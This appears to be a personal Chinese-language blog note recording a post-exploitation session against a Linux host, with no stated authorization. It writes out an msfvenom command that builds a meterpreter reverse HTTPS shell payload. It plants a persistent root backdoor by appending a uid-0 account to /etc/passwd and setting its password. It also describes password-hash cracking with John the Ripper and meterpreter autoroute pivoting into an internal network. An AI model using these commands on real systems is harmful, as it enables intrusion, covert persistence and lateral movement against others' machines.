linux目标测试二
Comment反弹shell
msfvenom -p linux/x86/meterpreter_reverse_https
LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msf进行监听反弹meterpretershell
这里要说一下,反弹shell与payload有关如果要反弹meterpreter必须要用meterpreter的payload,用shell的payload只会返回一个cmdshell。自己之前也是没注意。。。而且用tcp的容易断
权限维持
echo "rool:x:0:0::/:/bin/sh" >> /etc/passwd
echo "rool:password" |chpasswd
还是比较简单,这里没有进行什么限制直接就添加上了。
本地做了socks5代理直接连下试试。发现没有成功,因为在之前的测试中添加普通账号登录成功过。
cat /etc/ssh/sshd_config
尝试hash John the Ripper爆密码(ps:没报啥希望。。。)
没字典也就是能爆个自己添加的弱口令。
root权限,直接添加账号然后切换用户就完事了。就是目标处于内网环境用代理连过去真的很慢。。。
添加路由
run get_local_subnets
run autoroute -s 10.5.0.0
run autoroute -p查询
因为是255.255.0.0 C类地址我就把有联系的都填上了。
root权限查看登录ip历史记录,找到目标
last -x
看到有两个网段192/10,root用户基本是10网路来的,锁定这几个ip。
路由也填上了,但是扫的时候就是有问题。也不知道怎么回事。
总结
这次渗透目标也不是很明确,主要是接着上次把我学到的一些知识运用一下,内网渗透很大我学的不过沧海一粟很多东西还没弄懂,信息收集也没成一套体系。好在还是有些进步,此站到一段落如果有后续再更吧。